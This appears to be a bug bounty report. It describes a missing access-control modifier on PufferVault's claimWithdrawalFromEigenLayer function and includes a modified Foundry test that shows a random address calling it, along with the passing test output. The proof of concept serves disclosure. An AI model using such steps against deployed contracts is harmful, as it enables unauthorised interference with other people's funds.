Contract fails to deliver promised returns, but doesn't lose value
claimWithdrawalFromEigenLayer should be restricted access, according to natspec but unlike other functions it has not implemented restricted function
Vulnerability Details
PufferVault::claimWithdrawalFromEigenLayer function is used to claim stETH withdrawals from Eigen Layer and it netspac indicates that it should be restricted access as shown below
* @notice Claims stETH withdrawals from EigenLayer
@> * Restricted access
* @param queuedWithdrawal The queued withdrawal details
* @param tokens The tokens to be withdrawn
* @param middlewareTimesIndex The index of middleware times
But it does not implement restricted modifier, whereas every other function having restricted access in natspec implemented the restricted function clearly but it clearly doesn't implement.
Impact Details
As far as the netspac indicates that it should be restricted access so only restricted address can call it but having no restricted modifer means anyone can call this function.
Here is the test in PufferTest.integration.t.sol that is testing withdrawal from Eigen layer and this test is using OPERATION_MULTISIG address to call every function in this test and OPERATION_MULTISIG is one of the puffer team address.
But what if we mold the test to let any random address to call claim withdrawal. For this we have to let OPERATION_MULTISIG stop prank and prank it with a random address right before claim withdrawal.
functiontest_withdraw_from_eigenLayer()publicgiveToken(BLAST_DEPOSIT,address(stETH),address(pufferVault),1000ether) // BlastgotalotofstETH {// Simulate stETH cap increase call on EL_increaseELstETHCap();@> vm.startPrank(OPERATIONS_MULTISIG); //normal called by multisig (restricted address) puffer team address pufferVault.depositToEigenLayer(stETH.balanceOf(address(pufferVault)));uint256 ownedShares = _EIGEN_STRATEGY_MANAGER.stakerStrategyShares(address(pufferVault), _EIGEN_STETH_STRATEGY);uint256 assetsBefore = pufferVault.totalAssets();// Initiate the withdrawal pufferVault.initiateStETHWithdrawalFromEigenLayer(ownedShares);// 1 wei diff because of roundingassertApproxEqAbs(assetsBefore, pufferVault.totalAssets(),1,"should remain the same when locked"); IERC20[] memory tokens =new IERC20[](1); tokens[0] =IERC20(address(stETH)); IStrategy[] memory strategies =new IStrategy[](1); strategies[0] =IStrategy(_EIGEN_STETH_STRATEGY);uint256[] memory shares =newuint256[](1); shares[0] = ownedShares; IEigenLayer.WithdrawerAndNonce memory withdrawerAndNonce = IEigenLayer.WithdrawerAndNonce({ withdrawer:address(pufferVault), nonce:0 }); IEigenLayer.QueuedWithdrawal memory queuedWithdrawal = IEigenLayer.QueuedWithdrawal({ strategies: strategies, shares: shares, depositor:address(pufferVault), withdrawerAndNonce: withdrawerAndNonce, withdrawalStartBlock:uint32(block.number), delegatedAddress:address(0) });@> vm.stopPrank() //stop `OPEATION_MULTISIG` call // Roll block number + 100k blocks into the future vm.roll(block.number +100000);@> vm.prank(address(5)) // Pranked with a random address and test it// Claim Withdrawal pufferVault.claimWithdrawalFromEigenLayer(queuedWithdrawal, tokens,0);// 1 wei diff because of roundingassertApproxEqAbs(assetsBefore, pufferVault.totalAssets(),1,"should remain the same after withdrawal"); }
And the test passes
Running 2 tests for test/Integration/PufferTest.integration.t.sol:PufferTest[PASS] test_withdraw_from_eigenLayer() (gas:660064)[PASS] test_withdraw_from_eigenLayer_dos() (gas:888388)Test result: ok. 2 passed; 0 failed; 0 skipped; finished in 2.34sRan 1 test suites:2 tests passed,0 failed,0skipped (2 total tests)
If the proper restricted modifier was implemented correctly than this test should've been failed but lack of it let any random address to call this function.